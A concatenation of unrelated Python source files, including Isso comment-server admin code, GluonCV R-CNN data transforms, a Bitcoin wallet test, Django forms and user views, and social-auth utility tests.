if not self.isso.conf.getboolean("admin", "enabled"):
isso_host_script = self.isso.conf.get("server", "public-endpoint") or local.host
return render_template('disabled.html', isso_host_script=isso_host_script)
data = req.form
password = self.isso.conf.get("admin", "password")
if data['password'] and data['password'] == password:
response = redirect(re.sub(
r'/login$',
'/admin',
get_current_url(env, strip_querystring=True)
))
cookie = functools.partial(dump_cookie,
value=self.isso.sign({"logged": True}),
expires=datetime.now() + timedelta(1))
response.headers.add("Set-Cookie", cookie("admin-session"))
response.headers.add("X-Set-Cookie", cookie("isso-admin-session"))
return response
else:
isso_host_script = self.isso.conf.get("server", "public-endpoint") or local.host
return render_template('login.html', isso_host_script=isso_host_script)
def admin(self, env, req):
isso_host_script = self.isso.conf.get("server", "public-endpoint") or local.host
if not self.isso.conf.getboolean("admin", "enabled"):
return render_template('disabled.html', isso_host_script=isso_host_script)
try:
data = self.isso.unsign(req.cookies.get('admin-session', ''),
max_age=60 * 60 * 24)
except BadSignature:
return render_template('login.html', isso_host_script=isso_host_script)
if not data or not data['logged']:
return render_template('login.html', isso_host_script=isso_host_script)
page_size = 100
page = int(req.args.get('page', 0))
order_by = req.args.get('order_by', None)
asc = int(req.args.get('asc', 1))
mode = int(req.args.get('mode', 2))
comments = self.comments.fetchall(mode=mode, page=page,
limit=page_size,
order_by=order_by,
asc=asc)
comments_enriched = []
for comment in list(comments):
comment['hash'] = self.isso.sign(comment['id'])
comments_enriched.append(comment)
comment_mode_count = self.comments.count_modes()
max_page = int(sum(comment_mode_count.values()) / 100)
return render_template('admin.html', comments=comments_enriched,
page=int(page), mode=int(mode),
conf=self.conf, max_page=max_page,
counts=comment_mode_count,
order_by=order_by, asc=asc,
isso_host_script=isso_host_script)
"""
@api {get} /latest latest
@apiGroup Comment
@apiDescription
Get the latest comments from the system, no matter which thread
@apiParam {number} limit
The quantity of last comments to retrieve
@apiExample {curl} Get the latest 5 comments
curl 'https://comments.example.com/latest?limit=5'
@apiUse commentResponse
@apiSuccessExample Example result:
[
{
"website": null,
"uri": "/some",
"author": null,
"parent": null,
"created": 1464912312.123416,
"text": " <p>I want to use MySQL</p>",
"dislikes": 0,
"modified": null,
"mode": 1,
"id": 3,
"likes": 1
},
{
"website": null,
"uri": "/other",
"author": null,
"parent": null,
"created": 1464914341.312426,
"text": " <p>I want to use MySQL</p>",
"dislikes": 0,
"modified": null,
"mode": 1,
"id": 4,
"likes": 0
}
]
"""
def latest(self, environ, request):
# if the feature is not allowed, don't present the endpoint
if not self.conf.getboolean("latest-enabled"):
return NotFound()
# get and check the limit
bad_limit_msg = "Query parameter 'limit' is mandatory (integer, >0)"
try:
limit = int(request.args['limit'])
except (KeyError, ValueError):
return BadRequest(bad_limit_msg)
if limit <= 0:
return BadRequest(bad_limit_msg)
# retrieve the latest N comments from the DB
all_comments_gen = self.comments.fetchall(limit=None, order_by='created', mode='1')
comments = collections.deque(all_comments_gen, maxlen=limit)
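# (added note) deque(maxlen=limit) drops older entries as newer ones arrive,
# so after the generator is exhausted it holds only the `limit` most recently
# created comments (assuming fetchall yields in ascending creation order)
# without materialising the full result set as a list.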
# prepare a special set of fields (except text which is rendered specifically)
fields = {
'author',
'created',
'dislikes',
'id',
'likes',
'mode',
'modified',
'parent',
'text',
'uri',
'website',
}
# process the retrieved comments and build results
result = []
for comment in comments:
processed = {key: comment[key] for key in fields}
processed['text'] = self.isso.render(comment['text'])
result.append(processed)
return JSON(result, 200)
|
py | 7dfabb95cfb425ca7823e5bde83046c63e5e39be | word = input()
index_list = []
for index, value in enumerate(word):
ascii_number = ord(value)
if 65 <= ascii_number <= 90:
index_list.append(index)
print(index_list)
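# Hedged example (added): for the input "PyThon" this prints [0, 2], since
# only 'P' (ord 80) and 'T' (ord 84) fall in the uppercase ASCII range 65-90.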
|
py | 7dfabba93eb1331a97527f9e4f1c1113dfe5e2c5 | """Transforms for RCNN series."""
from __future__ import absolute_import
import copy
import mxnet as mx
from .. import bbox as tbbox
from .. import image as timage
from .. import mask as tmask
import numpy as np
__all__ = ['load_test',
'FasterRCNNDefaultTrainTransform', 'FasterRCNNDefaultValTransform',
'MaskRCNNDefaultTrainTransform', 'MaskRCNNDefaultValTransform',
'BDDMaskRCNNDefaultTrainTransform', 'BDDMaskRCNNDefaultValTransform']
def load_test(filenames, short=800, max_size=1280, mean=(0.485, 0.456, 0.406),
std=(0.229, 0.224, 0.225)):
"""A util function to load all images, transform them to tensor by applying
normalizations. This function supports a single filename or a list of filenames.
Parameters
----------
filenames : str or list of str
Image filename(s) to be loaded.
short : int, optional, default is 800
Resize image short side to this `short` and keep aspect ratio.
max_size : int, optional, default is 1280
Maximum longer side length to fit image.
This is to limit the input image shape, avoid processing too large image.
mean : iterable of float
Mean pixel values.
std : iterable of float
Standard deviations of pixel values.
Returns
-------
(mxnet.NDArray, numpy.ndarray) or list of such tuple
A (1, 3, H, W) mxnet NDArray as input to network, and a numpy ndarray as
original un-normalized color image for display.
If multiple image names are supplied, return two lists. You can use
``zip()`` to collapse it.
"""
if isinstance(filenames, str):
filenames = [filenames]
tensors = []
origs = []
for f in filenames:
img = mx.image.imread(f)
img = timage.resize_short_within(img, short, max_size)
orig_img = img.asnumpy().astype('uint8')
img = mx.nd.image.to_tensor(img)
img = mx.nd.image.normalize(img, mean=mean, std=std)
tensors.append(img.expand_dims(0))
origs.append(orig_img)
if len(tensors) == 1:
return tensors[0], origs[0]
return tensors, origs
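# Hedged usage sketch (added commentary, not part of the original module):
#
#     x, orig_img = load_test('street.jpg', short=800, max_size=1280)
#     # x        : (1, 3, H, W) normalized mx.nd.NDArray, ready for net(x)
#     # orig_img : uint8 numpy array kept for drawing the detections
#
# The filename 'street.jpg' is only an illustration.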
class FasterRCNNDefaultTrainTransform(object):
"""Default Faster-RCNN training transform.
Parameters
----------
short : int, default is 600
Resize image shorter side to ``short``.
max_size : int, default is 1000
Make sure image longer side is smaller than ``max_size``.
net : mxnet.gluon.HybridBlock, optional
The faster-rcnn network.
.. hint::
If net is ``None``, the transformation will not generate training targets.
Otherwise it will generate training targets to accelerate the training phase
since we push some workload to CPU workers instead of GPUs.
mean : array-like of size 3
Mean pixel values to be subtracted from image tensor. Default is [0.485, 0.456, 0.406].
std : array-like of size 3
Standard deviation to be divided from image. Default is [0.229, 0.224, 0.225].
box_norm : array-like of size 4, default is (1., 1., 1., 1.)
Std value to be divided from encoded values.
num_sample : int, default is 256
Number of samples for RPN targets.
pos_iou_thresh : float, default is 0.7
Anchors with IOU larger than ``pos_iou_thresh`` are regarded as positive samples.
neg_iou_thresh : float, default is 0.3
Anchors with IOU smaller than ``neg_iou_thresh`` are regarded as negative samples.
Anchors with IOU in between ``pos_iou_thresh`` and ``neg_iou_thresh`` are
ignored.
pos_ratio : float, default is 0.5
``pos_ratio`` defines how many positive samples (``pos_ratio * num_sample``) are
to be sampled.
"""
def __init__(self, short=600, max_size=1000, net=None, mean=(0.485, 0.456, 0.406),
std=(0.229, 0.224, 0.225), box_norm=(1., 1., 1., 1.),
num_sample=256, pos_iou_thresh=0.7, neg_iou_thresh=0.3,
pos_ratio=0.5, **kwargs):
self._short = short
self._max_size = max_size
self._mean = mean
self._std = std
self._anchors = None
if net is None:
return
# use fake data to generate fixed anchors for target generation
ashape = 128
# in case network has reset_ctx to gpu
anchor_generator = copy.deepcopy(net.rpn.anchor_generator)
anchor_generator.collect_params().reset_ctx(None)
anchors = anchor_generator(
mx.nd.zeros((1, 3, ashape, ashape))).reshape((1, 1, ashape, ashape, -1))
self._anchors = anchors
# record feature extractor for infer_shape
if not hasattr(net, 'features'):
raise ValueError("Cannot find features in network, is it a Faster-RCNN network?")
self._feat_sym = net.features(mx.sym.var(name='data'))
from ....model_zoo.rpn.rpn_target import RPNTargetGenerator
self._target_generator = RPNTargetGenerator(
num_sample=num_sample, pos_iou_thresh=pos_iou_thresh,
neg_iou_thresh=neg_iou_thresh, pos_ratio=pos_ratio,
stds=box_norm, **kwargs)
def __call__(self, src, label):
"""Apply transform to training image/label."""
# resize shorter side but keep in max_size
h, w, _ = src.shape
img = timage.resize_short_within(src, self._short, self._max_size, interp=1)
bbox = tbbox.resize(label, (w, h), (img.shape[1], img.shape[0]))
# random horizontal flip
h, w, _ = img.shape
img, flips = timage.random_flip(img, px=0.5)
bbox = tbbox.flip(bbox, (w, h), flip_x=flips[0])
# to tensor
img = mx.nd.image.to_tensor(img)
img = mx.nd.image.normalize(img, mean=self._mean, std=self._std)
if self._anchors is None:
return img, bbox.astype(img.dtype)
# generate RPN target so cpu workers can help reduce the workload
# feat_h, feat_w = (img.shape[1] // self._stride, img.shape[2] // self._stride)
oshape = self._feat_sym.infer_shape(data=(1, 3, img.shape[1], img.shape[2]))[1][0]
anchor = self._anchors[:, :, :oshape[2], :oshape[3], :].reshape((-1, 4))
gt_bboxes = mx.nd.array(bbox[:, :4])
cls_target, box_target, box_mask = self._target_generator(
gt_bboxes, anchor, img.shape[2], img.shape[1])
return img, bbox.astype(img.dtype), cls_target, box_target, box_mask
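# Hedged usage sketch (added commentary): the transform is usually applied
# lazily to a detection dataset, e.g.
#
#     transform = FasterRCNNDefaultTrainTransform(short=600, max_size=1000, net=net)
#     train_data = train_dataset.transform(transform)
#
# With net=None only (img, bbox) is returned; with a network the RPN targets
# are also produced on CPU workers, as described in the class docstring.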
class FasterRCNNDefaultValTransform(object):
"""Default Faster-RCNN validation transform.
Parameters
----------
short : int, default is 600
Resize image shorter side to ``short``.
max_size : int, default is 1000
Make sure image longer side is smaller than ``max_size``.
mean : array-like of size 3
Mean pixel values to be subtracted from image tensor. Default is [0.485, 0.456, 0.406].
std : array-like of size 3
Standard deviation to be divided from image. Default is [0.229, 0.224, 0.225].
"""
def __init__(self, short=600, max_size=1000,
mean=(0.485, 0.456, 0.406), std=(0.229, 0.224, 0.225)):
self._mean = mean
self._std = std
self._short = short
self._max_size = max_size
def __call__(self, src, label):
"""Apply transform to validation image/label."""
# resize shorter side but keep in max_size
h, w, _ = src.shape
img = timage.resize_short_within(src, self._short, self._max_size, interp=1)
# no scaling ground-truth, return image scaling ratio instead
bbox = tbbox.resize(label, (w, h), (img.shape[1], img.shape[0]))
im_scale = h / float(img.shape[0])
img = mx.nd.image.to_tensor(img)
img = mx.nd.image.normalize(img, mean=self._mean, std=self._std)
return img, bbox.astype('float32'), mx.nd.array([im_scale])
class MaskRCNNDefaultTrainTransform(object):
"""Default Mask RCNN training transform.
Parameters
----------
short : int, default is 600
Resize image shorter side to ``short``.
max_size : int, default is 1000
Make sure image longer side is smaller than ``max_size``.
net : mxnet.gluon.HybridBlock, optional
The Mask R-CNN network.
.. hint::
If net is ``None``, the transformation will not generate training targets.
Otherwise it will generate training targets to accelerate the training phase
since we push some workload to CPU workers instead of GPUs.
mean : array-like of size 3
Mean pixel values to be subtracted from image tensor. Default is [0.485, 0.456, 0.406].
std : array-like of size 3
Standard deviation to be divided from image. Default is [0.229, 0.224, 0.225].
box_norm : array-like of size 4, default is (1., 1., 1., 1.)
Std value to be divided from encoded values.
num_sample : int, default is 256
Number of samples for RPN targets.
pos_iou_thresh : float, default is 0.7
Anchors with IOU larger than ``pos_iou_thresh`` are regarded as positive samples.
neg_iou_thresh : float, default is 0.3
Anchors with IOU smaller than ``neg_iou_thresh`` are regarded as negative samples.
Anchors with IOU in between ``pos_iou_thresh`` and ``neg_iou_thresh`` are
ignored.
pos_ratio : float, default is 0.5
``pos_ratio`` defines how many positive samples (``pos_ratio * num_sample``) are
to be sampled.
"""
def __init__(self, short=600, max_size=1000, net=None, mean=(0.485, 0.456, 0.406),
std=(0.229, 0.224, 0.225), box_norm=(1., 1., 1., 1.),
num_sample=256, pos_iou_thresh=0.7, neg_iou_thresh=0.3,
pos_ratio=0.5, **kwargs):
self._short = short
self._max_size = max_size
self._mean = mean
self._std = std
self._anchors = None
if net is None:
return
# use fake data to generate fixed anchors for target generation
ashape = 128
# in case network has reset_ctx to gpu
anchor_generator = copy.deepcopy(net.rpn.anchor_generator)
anchor_generator.collect_params().reset_ctx(None)
anchors = anchor_generator(
mx.nd.zeros((1, 3, ashape, ashape))).reshape((1, 1, ashape, ashape, -1))
self._anchors = anchors
# record feature extractor for infer_shape
if not hasattr(net, 'features'):
raise ValueError("Cannot find features in network, is it a Mask RCNN network?")
self._feat_sym = net.features(mx.sym.var(name='data'))
from ....model_zoo.rpn.rpn_target import RPNTargetGenerator
self._target_generator = RPNTargetGenerator(
num_sample=num_sample, pos_iou_thresh=pos_iou_thresh,
neg_iou_thresh=neg_iou_thresh, pos_ratio=pos_ratio,
stds=box_norm, **kwargs)
def __call__(self, src, label, segm):
"""Apply transform to training image/label."""
# resize shorter side but keep in max_size
h, w, _ = src.shape
img = timage.resize_short_within(src, self._short, self._max_size, interp=1)
bbox = tbbox.resize(label, (w, h), (img.shape[1], img.shape[0]))
segm = [tmask.resize(polys, (w, h), (img.shape[1], img.shape[0])) for polys in segm]
# random horizontal flip
h, w, _ = img.shape
img, flips = timage.random_flip(img, px=0.5)
bbox = tbbox.flip(bbox, (w, h), flip_x=flips[0])
segm = [tmask.flip(polys, (w, h), flip_x=flips[0]) for polys in segm]
# gt_masks (n, im_height, im_width) of uint8 -> float32 (cannot take uint8)
masks = [mx.nd.array(tmask.to_mask(polys, (w, h))) for polys in segm]
# n * (im_height, im_width) -> (n, im_height, im_width)
masks = mx.nd.stack(*masks, axis=0)
# to tensor
img = mx.nd.image.to_tensor(img)
img = mx.nd.image.normalize(img, mean=self._mean, std=self._std)
if self._anchors is None:
return img, bbox.astype(img.dtype), masks
# generate RPN target so cpu workers can help reduce the workload
# feat_h, feat_w = (img.shape[1] // self._stride, img.shape[2] // self._stride)
oshape = self._feat_sym.infer_shape(data=(1, 3, img.shape[1], img.shape[2]))[1][0]
anchor = self._anchors[:, :, :oshape[2], :oshape[3], :].reshape((-1, 4))
gt_bboxes = mx.nd.array(bbox[:, :4])
cls_target, box_target, box_mask = self._target_generator(
gt_bboxes, anchor, img.shape[2], img.shape[1])
return img, bbox.astype(img.dtype), masks, cls_target, box_target, box_mask
class MaskRCNNDefaultValTransform(object):
"""Default Mask RCNN validation transform.
Parameters
----------
short : int, default is 600
Resize image shorter side to ``short``.
max_size : int, default is 1000
Make sure image longer side is smaller than ``max_size``.
mean : array-like of size 3
Mean pixel values to be subtracted from image tensor. Default is [0.485, 0.456, 0.406].
std : array-like of size 3
Standard deviation to be divided from image. Default is [0.229, 0.224, 0.225].
"""
def __init__(self, short=600, max_size=1000,
mean=(0.485, 0.456, 0.406), std=(0.229, 0.224, 0.225)):
self._mean = mean
self._std = std
self._short = short
self._max_size = max_size
def __call__(self, src, label, mask):
"""Apply transform to validation image/label."""
# resize shorter side but keep in max_size
h, _, _ = src.shape
img = timage.resize_short_within(src, self._short, self._max_size, interp=1)
# no scaling ground-truth, return image scaling ratio instead
im_scale = float(img.shape[0]) / h
img = mx.nd.image.to_tensor(img)
img = mx.nd.image.normalize(img, mean=self._mean, std=self._std)
return img, mx.nd.array([img.shape[-2], img.shape[-1], im_scale])
class BDDMaskRCNNDefaultTrainTransform(object):
"""Default Mask RCNN training transform.
Parameters
----------
short : int, default is 600
Resize image shorter side to ``short``.
max_size : int, default is 1000
Make sure image longer side is smaller than ``max_size``.
net : mxnet.gluon.HybridBlock, optional
The Mask R-CNN network.
.. hint::
If net is ``None``, the transformation will not generate training targets.
Otherwise it will generate training targets to accelerate the training phase
since we push some workload to CPU workers instead of GPUs.
mean : array-like of size 3
Mean pixel values to be subtracted from image tensor. Default is [0.485, 0.456, 0.406].
std : array-like of size 3
Standard deviation to be divided from image. Default is [0.229, 0.224, 0.225].
box_norm : array-like of size 4, default is (1., 1., 1., 1.)
Std value to be divided from encoded values.
num_sample : int, default is 256
Number of samples for RPN targets.
pos_iou_thresh : float, default is 0.7
Anchors with IOU larger than ``pos_iou_thresh`` are regarded as positive samples.
neg_iou_thresh : float, default is 0.3
Anchors with IOU smaller than ``neg_iou_thresh`` are regarded as negative samples.
Anchors with IOU in between ``pos_iou_thresh`` and ``neg_iou_thresh`` are
ignored.
pos_ratio : float, default is 0.5
``pos_ratio`` defines how many positive samples (``pos_ratio * num_sample``) are
to be sampled.
"""
def __init__(self, short=600, max_size=1000, net=None, mean=(0.485, 0.456, 0.406),
std=(0.229, 0.224, 0.225), box_norm=(1., 1., 1., 1.),
num_sample=256, pos_iou_thresh=0.7, neg_iou_thresh=0.3,
pos_ratio=0.5, segm_scale=0.25, one_hot_label=False, **kwargs):
self._short = short
self._max_size = max_size
self._segm_scale = segm_scale
self._one_hot_label = one_hot_label
self._mean = mean
self._std = std
self._anchors = None
if net is None:
return
print('BDDMaskRCNNDefaultTrainTransform use one_hot label', one_hot_label)
# use fake data to generate fixed anchors for target generation
ashape = 128
# in case network has reset_ctx to gpu
anchor_generator = copy.deepcopy(net.rpn.anchor_generator)
anchor_generator.collect_params().reset_ctx(None)
anchors = anchor_generator(
mx.nd.zeros((1, 3, ashape, ashape))).reshape((1, 1, ashape, ashape, -1))
self._anchors = anchors
# record feature extractor for infer_shape
if not hasattr(net, 'features'):
raise ValueError("Cannot find features in network, is it a Mask RCNN network?")
self._feat_sym = net.features(mx.sym.var(name='data'))
from ....model_zoo.rpn.rpn_target import RPNTargetGenerator
self._target_generator = RPNTargetGenerator(
num_sample=num_sample, pos_iou_thresh=pos_iou_thresh,
neg_iou_thresh=neg_iou_thresh, pos_ratio=pos_ratio,
stds=box_norm, **kwargs)
def __call__(self, src, label, segm):
"""Apply transform to training image/label."""
# resize shorter side but keep in max_size
h, w, _ = src.shape
img = timage.resize_short_within(src, self._short, self._max_size, interp=1)
bbox = tbbox.resize(label, (w, h), (img.shape[1], img.shape[0]))
segm = timage.resize_short_within(segm, self._short * self._segm_scale, self._max_size * self._segm_scale, interp=1)
# random horizontal flip
h, w, _ = img.shape
img, flips = timage.random_flip(img, px=0.5)
bbox = tbbox.flip(bbox, (w, h), flip_x=flips[0])
segm = timage.flip_likes(segm, flip_x=flips[0], flip_y=flips[1])
# to tensor
img = mx.nd.image.to_tensor(img)
img = mx.nd.image.normalize(img, mean=self._mean, std=self._std)
drivable_maps = mx.nd.image.to_tensor(segm)
if self._anchors is None:
return img, bbox.astype(img.dtype), drivable_maps
drivable_maps = drivable_maps * 127.5
if self._one_hot_label:
drivable_maps = drivable_maps * 2
a,b,c = mx.nd.split(drivable_maps, axis=0, num_outputs=3)
a = a==0.
b = b==1.
c = c==2.
drivable_maps = mx.nd.concat(a,b,c,dim=0)
# print(drivable_maps.shape) #3x180x320
# generate RPN target so cpu workers can help reduce the workload
# feat_h, feat_w = (img.shape[1] // self._stride, img.shape[2] // self._stride)
oshape = self._feat_sym.infer_shape(data=(1, 3, img.shape[1], img.shape[2]))[1][0]
anchor = self._anchors[:, :, :oshape[2], :oshape[3], :].reshape((-1, 4))
gt_bboxes = mx.nd.array(bbox[:, :4])
cls_target, box_target, box_mask = self._target_generator(
gt_bboxes, anchor, img.shape[2], img.shape[1])
# print('drivable_maps' , mx.nd.sum(drivable_maps >= 1))
return img, bbox.astype(img.dtype), drivable_maps, cls_target, box_target, box_mask
class BDDMaskRCNNDefaultValTransform(object):
"""Default Mask RCNN validation transform.
Parameters
----------
short : int, default is 600
Resize image shorter side to ``short``.
max_size : int, default is 1000
Make sure image longer side is smaller than ``max_size``.
mean : array-like of size 3
Mean pixel values to be subtracted from image tensor. Default is [0.485, 0.456, 0.406].
std : array-like of size 3
Standard deviation to be divided from image. Default is [0.229, 0.224, 0.225].
"""
def __init__(self, short=600, max_size=1000,
mean=(0.485, 0.456, 0.406), std=(0.229, 0.224, 0.225), segm_scale=0.25, one_hot_label=False):
self._mean = mean
self._std = std
self._short = short
self._max_size = max_size
self._segm_scale = segm_scale
self._one_hot_label = one_hot_label
def __call__(self, src, label, mask, filepath):
"""Apply transform to validation image/label."""
# resize shorter side but keep in max_size
h, _, _ = src.shape
img = timage.resize_short_within(src, self._short, self._max_size, interp=1)
# no scaling ground-truth, return image scaling ratio instead
im_scale = float(img.shape[0]) / h
img = mx.nd.image.to_tensor(img)
img = mx.nd.image.normalize(img, mean=self._mean, std=self._std)
# mask = timage.resize_short_within(mask, self._short * self._segm_scale, self._max_size * self._segm_scale, interp=1)
return img, mx.nd.array([img.shape[-2], img.shape[-1], im_scale]), filepath
|
py | 7dfabc96ad7668fa87654e57291ae9e1a4626de2 | #!/usr/bin/env python3
# Copyright (c) 2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import (
assert_equal,
)
class CreateTxWalletTest(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = False
self.num_nodes = 1
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def run_test(self):
self.log.info('Check that we have some (old) blocks and that anti-fee-sniping is disabled')
self.bump_mocktime(8 * 60 * 60 + 1)
assert_equal(self.nodes[0].getblockchaininfo()['blocks'], 200)
txid = self.nodes[0].sendtoaddress(self.nodes[0].getnewaddress(), 1)
tx = self.nodes[0].decoderawtransaction(self.nodes[0].gettransaction(txid)['hex'])
assert_equal(tx['locktime'], 0)
self.log.info('Check that anti-fee-sniping is enabled when we mine a recent block')
self.nodes[0].generate(1)
txid = self.nodes[0].sendtoaddress(self.nodes[0].getnewaddress(), 1)
tx = self.nodes[0].decoderawtransaction(self.nodes[0].gettransaction(txid)['hex'])
assert 0 < tx['locktime'] <= 201
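# (added note) with a freshly mined tip the wallet sets nLockTime close to
# the current height to make fee sniping unattractive, hence the locktime is
# expected to land in (0, 201] once the chain is at height 201.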
if __name__ == '__main__':
CreateTxWalletTest().main()
|
py | 7dfabdc83291032d18003876929b0660583e9adc | from gcpdjango.apps.main.models import Project, FormTemplate
from bootstrap_datepicker_plus import DatePickerInput
from django import forms
class ProjectForm(forms.ModelForm):
class Meta:
model = Project
# Group is associated to the user creating the project
fields = ("name", "description", "contact")
def __init__(self, *args, **kwargs):
super(ProjectForm, self).__init__(*args, **kwargs)
for visible in self.visible_fields():
visible.field.widget.attrs["class"] = "form-control"
class FormTemplateForm(forms.ModelForm):
"""A form to populate a project template. Commented out fields are
not required for stage 1
"""
stage = 1
class Meta:
model = FormTemplate
widgets = {
"start_date": DatePickerInput(),
"end_date": DatePickerInput(),
}
fields = (
"name",
"start_date",
"end_date",
"target_audience_disciplines",
"target_audience_roles",
"target_audience_across_orgs",
"target_audience_within_org",
"target_audience_teams_across_orgs",
"implement_strategy_description",
"consider_system_factors",
"consider_org_factors",
"consider_clinical_factors",
"consider_sustainment_strategy",
"outcome_reach",
"outcome_effectiveness",
"outcome_adoption",
"outcome_quality",
"outcome_cost",
"outcome_maintenance",
"outcome_other",
"implementation_recruited",
"implementation_participants",
"implementation_enrolled",
"implementation_completing_half",
"implementation_completing_majority",
"results_reach",
"results_effectiveness",
"results_adoption",
"results_quality",
"results_cost",
"results_maintenance",
"results_other",
)
def __init__(self, *args, **kwargs):
super(FormTemplateForm, self).__init__(*args, **kwargs)
for visible in self.visible_fields():
visible.field.widget.attrs["class"] = "form-control"
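# Hedged view-side sketch for the forms above; the view name, template path and
# redirect target are illustrative assumptions, not part of this app.
#
#   from django.shortcuts import render, redirect
#
#   def create_project(request):
#       form = ProjectForm(request.POST or None)
#       if request.method == "POST" and form.is_valid():
#           form.save()
#           return redirect("home")
#       return render(request, "main/project_form.html", {"form": form})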
|
py | 7dfabe44a306ba6b205a1740e4c724c913ac1fa0 | import sys
import unittest
from sure import expect
from social.utils import sanitize_redirect, user_is_authenticated, \
user_is_active, slugify, build_absolute_uri
PY3 = sys.version_info[0] == 3
class SanitizeRedirectTest(unittest.TestCase):
def test_none_redirect(self):
expect(sanitize_redirect('myapp.com', None)).to.equal(None)
def test_empty_redirect(self):
expect(sanitize_redirect('myapp.com', '')).to.equal(None)
def test_dict_redirect(self):
expect(sanitize_redirect('myapp.com', {})).to.equal(None)
def test_invalid_redirect(self):
expect(sanitize_redirect('myapp.com',
{'foo': 'bar'})).to.equal(None)
def test_wrong_path_redirect(self):
expect(sanitize_redirect(
'myapp.com',
'http://notmyapp.com/path/'
)).to.equal(None)
def test_valid_absolute_redirect(self):
expect(sanitize_redirect(
'myapp.com',
'http://myapp.com/path/'
)).to.equal('http://myapp.com/path/')
def test_valid_relative_redirect(self):
expect(sanitize_redirect('myapp.com', '/path/')).to.equal('/path/')
class UserIsAuthenticatedTest(unittest.TestCase):
def test_user_is_none(self):
expect(user_is_authenticated(None)).to.equal(False)
def test_user_is_not_none(self):
expect(user_is_authenticated(object())).to.equal(True)
def test_user_has_is_authenticated(self):
class User(object):
is_authenticated = True
expect(user_is_authenticated(User())).to.equal(True)
def test_user_has_is_authenticated_callable(self):
class User(object):
def is_authenticated(self):
return True
expect(user_is_authenticated(User())).to.equal(True)
class UserIsActiveTest(unittest.TestCase):
def test_user_is_none(self):
expect(user_is_active(None)).to.equal(False)
def test_user_is_not_none(self):
expect(user_is_active(object())).to.equal(True)
def test_user_has_is_active(self):
class User(object):
is_active = True
expect(user_is_active(User())).to.equal(True)
def test_user_has_is_active_callable(self):
class User(object):
def is_active(self):
return True
expect(user_is_active(User())).to.equal(True)
class SlugifyTest(unittest.TestCase):
def test_slugify_formats(self):
if PY3:
expect(slugify('FooBar')).to.equal('foobar')
expect(slugify('Foo Bar')).to.equal('foo-bar')
expect(slugify('Foo (Bar)')).to.equal('foo-bar')
else:
expect(slugify('FooBar'.decode('utf-8'))).to.equal('foobar')
expect(slugify('Foo Bar'.decode('utf-8'))).to.equal('foo-bar')
expect(slugify('Foo (Bar)'.decode('utf-8'))).to.equal('foo-bar')
class BuildAbsoluteURITest(unittest.TestCase):
def setUp(self):
self.host = 'http://foobar.com'
def tearDown(self):
self.host = None
def test_path_none(self):
expect(build_absolute_uri(self.host)).to.equal(self.host)
def test_path_empty(self):
expect(build_absolute_uri(self.host, '')).to.equal(self.host)
def test_path_http(self):
expect(build_absolute_uri(self.host, 'http://barfoo.com')) \
.to.equal('http://barfoo.com')
def test_path_https(self):
expect(build_absolute_uri(self.host, 'https://barfoo.com')) \
.to.equal('https://barfoo.com')
def test_host_ends_with_slash_and_path_starts_with_slash(self):
expect(build_absolute_uri(self.host + '/', '/foo/bar')) \
.to.equal('http://foobar.com/foo/bar')
def test_absolute_uri(self):
expect(build_absolute_uri(self.host, '/foo/bar')) \
.to.equal('http://foobar.com/foo/bar')
|
py | 7dfabf806880c03a41eb859697609a708f441a76 | import sys
import nltk
import sklearn.feature_extraction.text
import sklearn.metrics.pairwise
def getText(filename):
    with open(filename, 'r', encoding='UTF-8') as f:
        return f.read()
def getVector(filename1, filename2):
words = []
words.append(" ".join(nltk.word_tokenize(getText(filename1))))
words.append(" ".join(nltk.word_tokenize(getText(filename2))))
countVector = sklearn.feature_extraction.text.CountVectorizer()
vec = countVector.fit_transform(words)
#print(vec.toarray())
return sklearn.metrics.pairwise.cosine_similarity(vec[0], vec[1])
def main():
file1 = sys.argv[1]
file2 = sys.argv[2]
print('The content of '+file1+' is:\n'+getText(file1)+'\n')
print('The content of '+file2+' is:\n'+getText(file2)+'\n\n')
print('The cosine_similarity of '+file1+' and ' +
file2+' is: '+str(getVector(file1, file2)[0][0]))
if __name__ == '__main__':
main()
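# Worked sketch of the same computation using scikit-learn directly
# (hypothetical strings instead of files; the value is approximate):
#
#   from sklearn.feature_extraction.text import CountVectorizer
#   from sklearn.metrics.pairwise import cosine_similarity
#   vec = CountVectorizer().fit_transform(["the cat sat", "the cat sat down"])
#   print(cosine_similarity(vec[0], vec[1])[0][0])    # ~0.87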
|
py | 7dfabf9149867ee16f8069b5e780d3971f4aefb9 | import jwt
from django.contrib.auth.decorators import login_required
from django.contrib.auth import logout, authenticate, login
from django.core.mail import send_mail
from django.template.loader import render_to_string
from django.urls import reverse_lazy
from django.utils.http import is_safe_url
from django.utils import timezone
from django.shortcuts import render, redirect, resolve_url
from django.contrib import messages
from django.conf import settings
from users.models import User
from users.forms import LoginForm, RegisterForm, PasswordResetForm, ChangePasswordForm
from users.decorators import guest_only
from users.utils import send_user_email_verification
@guest_only
def register_view(request):
if request.method == 'POST':
form = RegisterForm(request.POST)
if form.is_valid():
user = form.save()
send_user_email_verification(request, user)
messages.success(request, 'Your account has been created!')
return redirect('users:login')
else:
form = RegisterForm()
return render(request, 'users/register.html', {'form': form})
@guest_only
def login_view(request):
redirect_to = request.GET.get('next', None)
if not is_safe_url(url=redirect_to, allowed_hosts=None):
redirect_to = resolve_url('users:profile')
if request.method == 'POST':
form = LoginForm(request.POST)
if form.is_valid():
login_data = form.cleaned_data['login']
password_data = form.cleaned_data['password']
user = authenticate(username=login_data, password=password_data)
if user:
login(request, user)
return redirect(redirect_to)
else:
messages.error(request, 'Login or password invalid')
else:
form = LoginForm()
return render(request, 'users/login.html', {'form': form})
@login_required
def logout_view(request):
logout(request)
return redirect('home')
@guest_only
def password_reset(request):
if request.method == 'POST':
form = PasswordResetForm(request.POST)
if form.is_valid():
email = form.cleaned_data['email']
try:
user = User.objects.get(email=email)
except User.DoesNotExist:
user = None
if user:
expires = timezone.now() + timezone.timedelta(minutes=5)
token = jwt.encode({'username': user.username, 'exp': expires}, settings.SECRET_KEY, algorithm='HS256')
url = request.build_absolute_uri(reverse_lazy('users:new-password', args=(token,)))
subject = '[Auth App] Please reset your password.'
from_mail = '[email protected]'
to_mail = user.email
text_content = 'content'
html_content = render_to_string('emails/password_reset.html', {'url': url})
send_mail(subject, text_content, from_mail, [to_mail], html_message=html_content)
messages.success(
request, (
'Check your email for a link to reset your password. '
'If it does not appear within a few minutes, check your spam folder.'
)
)
return redirect('users:password-reset')
else:
form = PasswordResetForm()
